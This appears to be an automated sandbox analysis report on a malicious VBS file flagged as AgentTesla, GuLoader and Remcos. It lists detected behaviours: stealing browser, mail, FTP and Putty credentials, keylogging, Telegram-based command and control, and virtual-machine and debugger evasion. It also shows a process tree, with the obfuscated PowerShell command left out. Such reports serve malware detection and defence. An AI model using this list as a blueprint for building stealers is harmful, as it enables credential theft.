Windows
Analysis Report
IMG_2022028022-0120.vbs
Overview
General Information
Detection
AgentTesla, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
- wscript.exe (PID: 7408 cmdline:
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
- powershell.exe (PID: 6472 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [very long obfuscated command line omitted; truncated in the report])